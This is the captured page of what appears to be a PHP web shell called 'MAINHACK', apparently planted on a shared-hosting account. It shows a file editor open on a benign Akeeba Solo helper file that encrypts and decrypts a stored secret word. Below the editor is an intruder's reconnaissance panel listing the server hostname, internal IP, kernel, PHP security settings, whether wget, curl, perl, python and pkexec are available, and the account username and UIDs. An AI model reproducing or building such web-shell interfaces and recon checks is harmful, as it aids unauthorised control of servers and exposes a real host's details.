[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: SecretWord.php
<?php /** * @package solo * @copyright Copyright (c)2014-2026 Nicholas K. Dionysopoulos / Akeeba Ltd * @license GNU General Public License version 3, or later */ namespace Solo\Helper; use Akeeba\Engine\Factory; use Awf\Application\Application; use Awf\Container\Container; abstract class SecretWord { /** * Enforce (reversible) encryption for the component setting $settingsKey * * @param string $settingsKey The key for the setting containing the secret word * * @return void * * @throws \Awf\Exception\App * * @since 5.5.2 */ public static function enforceEncryption($settingsKey, Container $container) { $params = $container->appConfig; // If encryption is not enabled in the Engine we can't encrypt the Secret Word if ($params->get('useencryption', -1) == 0) { return; } // If encryption is not supported on this server we can't encrypt the Secret Word if (!Factory::getSecureSettings()->supportsEncryption()) { return; } // Get the raw version of frontend_secret_word and check if it has a valid encryption signature $raw = $params->get('options.' . $settingsKey, ''); $signature = substr($raw, 0, 12); $validSignatures = array('###AES128###', '###CTR128###'); // If the setting is already encrypted I have nothing to do here if (in_array($signature, $validSignatures)) { return; } // The setting was NOT encrypted. I need to encrypt it. $secureSettings = Factory::getSecureSettings(); $encrypted = $secureSettings->encryptSettings($raw); // Finally, I need to save it back to the database $params->set('options.' . $settingsKey, $encrypted); $params->saveConfiguration(); } /** * Forcibly store the Secret Word settings $settingsKey unencrypted in the database. This is meant to be called when * the user disables settings encryption. Since the encryption key will be deleted we need to decrypt the Secret * Word at the same time as the Engine settings. Otherwise we will never be able to access it again. * * @param string $settingsKey The key of the Secret Word parameter * @param string|null $encryptionKey (Optional) The AES key with which to decrypt the parameter * * @return void * * @throws \Awf\Exception\App * * @since 5.5.2 */ public static function enforceDecrypted($settingsKey, $encryptionKey = null, ?Container $container = null) { // Get the raw version of frontend_secret_word and check if it has a valid encryption signature $params = $container->appConfig; $raw = $params->get('options.' . $settingsKey, ''); $signature = substr($raw, 0, 12); $validSignatures = array('###AES128###', '###CTR128###'); // If the setting is not already encrypted I have nothing to decrypt if (!in_array($signature, $validSignatures)) { return; } // The setting was encrypted. I need to decrypt it. $secureSettings = Factory::getSecureSettings(); $decrypted = $secureSettings->decryptSettings($raw, $encryptionKey); // Finally, I need to save it back to the database $params->set('options.' . $settingsKey, $decrypted); $params->saveConfiguration(); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm021.cluster127.gra.hosting.ovh.net
Server IP: 10.127.20.21
PHP Version: 8.4.22
Server Software: Apache
System: Linux webm021.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: vcomplcotr
User ID (UID): 38697
Group ID (GID): 100
Script Owner UID: 38697
Current Dir Owner: 38697